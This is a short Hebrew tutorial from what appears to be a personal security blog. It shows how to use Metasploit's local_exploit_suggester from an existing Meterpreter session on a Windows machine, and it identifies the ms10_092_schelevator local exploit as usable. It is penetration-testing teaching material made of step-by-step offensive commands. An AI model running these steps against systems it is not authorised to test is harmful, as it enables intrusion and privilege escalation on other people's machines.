כל הזכויות שמורות לטל בן שושן – Shushan.co.il

Post Exploitation | ביצוע סריקת Exploits בתחנה ע"י Metasploit

על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit

פיצ'ר נוסף שקיים ב Metasploit הוא היכולת לסרוק את התחנה, לבדוק אילו Exploits יכולים לרוץ ובכך לעזור לנו ל"תקוף" את המערכת

דרוש:

• Kali
• Windows 7/8/10
• גישת Meterpreter אל התחנה(קיימים מדריכים באתר)

כעת נרשום background על מנת להכניס את ה Session ברקע, כדי שנוכל להגדיר את ה Exploit

meterpreter > background

כעת נשתמש ב Exploit

msf exploit > use post/multi/recon/local_exploit_suggester

כעת נבדוק מה ה session שלנו

msf exploit (local_exploit_suggester) > sessions

ה ID שלו זה 4, לכן

msf exploit (local_exploit_suggester) > set session 4

כעת נריץ אותו

msf exploit (local_exploit_suggester) > run

מעולה! ניתן להבחין ש

exploit/windows/local/ms10_092_schelevator

ניתן להשתמש בו על התחנה